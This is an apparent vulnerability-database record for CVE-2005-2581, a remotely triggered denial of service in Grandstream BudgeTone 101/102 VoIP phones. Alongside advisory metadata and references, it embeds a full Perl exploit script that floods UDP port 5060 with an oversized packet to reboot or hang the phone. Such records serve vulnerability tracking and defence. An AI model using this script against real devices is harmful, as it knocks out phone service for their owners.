Search...

Grandstream Budge Tone Malformed UDP Packet DoS

2005-08-12T05:08:54

ID OSVDB:18731
Type osvdb
Reporter OSVDB
Modified 2005-08-12T05:08:54

Description

No description provided by the source

References:

Security Tracker: 1014665 Secunia Advisory ID:16438 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0189.html Keyword: SySS-Advisory CVE-2005-2581

JSON Vulners Source

Initial Source

{"type": "osvdb", "published": "2005-08-12T05:08:54", "href": "https://vulners.com/osvdb/OSVDB:18731", "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ea3ba029674c6f075a1e6ef814046749"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "39e95c08bde87b75e49f782ec84db992"}, {"key": "href", "hash": "8013cade684204d29610c03e9bffc2c5"}, {"key": "modified", "hash": "8ef15fa57838e222169ab112ff9159c4"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8ef15fa57838e222169ab112ff9159c4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "eb07760e12839727409e3c402835b40b"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 0, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "OSVDB", "title": "Grandstream Budge Tone Malformed UDP Packet DoS", "affectedSoftware": [], "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2581"]}, {"type": "exploitdb", "idList": ["EDB-ID:1153"]}], "modified": "2017-04-28T13:20:15"}, "vulnersScore": 5.0}, "references": [], "id": "OSVDB:18731", "hash": "5d2edd02afb357d11665df0cb4d99b02afac2b8b1d687d97e2a2c77977f27a3c", "lastseen": "2017-04-28T13:20:15", "cvelist": ["CVE-2005-2581"], "modified": "2005-08-12T05:08:54", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1014665\n[Secunia Advisory ID:16438](https://secuniaresearch.flexerasoftware.com/advisories/16438/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0189.html\nKeyword: SySS-Advisory\n[CVE-2005-2581](https://vulners.com/cve/CVE-2005-2581)\n"}

{"cve": [{"lastseen": "2017-04-18T15:51:23", "bulletinFamily": "NVD", "description": "Grandstream BudgeTone 101 and 102 running firmware 1.0.6.7 and possibly earlier versions, allows remote attackers to cause a denial of service (device hang or reboot) via a large UDP packet to port 5060.", "modified": "2016-10-17T23:28:47", "published": "2005-08-16T00:00:00", "id": "CVE-2005-2581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2581", "title": "CVE-2005-2581", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:39:08", "bulletinFamily": "exploit", "description": "Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit. CVE-2005-2581. Dos exploit for hardware platform", "modified": "2005-08-12T00:00:00", "published": "2005-08-12T00:00:00", "id": "EDB-ID:1153", "href": "https://www.exploit-db.com/exploits/1153/", "type": "exploitdb", "title": "Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit", "sourceData": "#!/usr/bin/perl\r\n#\r\nuse IO::Socket;\r\nuse Term::ANSIColor;\r\n\r\n############################ U S A G E ###################################\r\nsystem (\"clear\");\r\nprint \"\\nGrandstream BT101/BT102 DoS\\n\";\r\nprint \"written by pierre kroma (kroma\\@syss.de)\\n\\n\";\r\n\r\nif (!$ARGV[2]){\r\nprint qq~\r\nUsage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}\r\n\r\n\t<ip-addr> = ;-)\r\n\t<udp-port> = 5060\r\n\r\n\t-r = 'reboot' \tthe Grandstream BT 101/102\r\n\t-s = 'shutdown' the Grandstream BT 101/102\r\n\r\n~; exit;}\r\n################################## D E F I N I T I O N S####################\r\n\r\n$victim = $ARGV[0];\r\n$port = $ARGV[1];\r\n$option = $ARGV[2];\r\n\r\nif ( $option == 'r' || $option == 'R' )\r\n{\t$request= 'k'x65534;}\r\n\r\nif ( $option == 's' || $option == 'S' )\r\n{\t$request= 'p'x65535;}\r\nelse\r\n{\tprint \"Wrong parameter - try it again\";\r\n\texit;\r\n}\r\n\r\n\r\n# ping the remote device\r\nprint color 'bold blue';\r\nprint \"\\nping the remote device $victim\\n\";\r\nprint color 'reset';\r\nsystem(\"ping -c 3 $victim\");\r\n\r\nprint color 'bold red';\r\nprint \"\\n Wait ... \\n\\n\\n\";\r\nprint color 'reset';\r\n$sox = IO::Socket::INET->new(Proto=>\"udp\",PeerPort=>\"$port\",PeerAddr=>\"$victim\");\r\n\r\nprint $sox $request;\r\nsleep 1;\r\nclose $sox;\r\n\r\n# ping the remote device\r\nprint color 'bold blue';\r\nprint \"ping the remote device $victim again\\n\";\r\nprint color 'reset';\r\nsystem(\"ping -c 3 $victim\");\n\n# milw0rm.com [2005-08-12]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1153/"}]}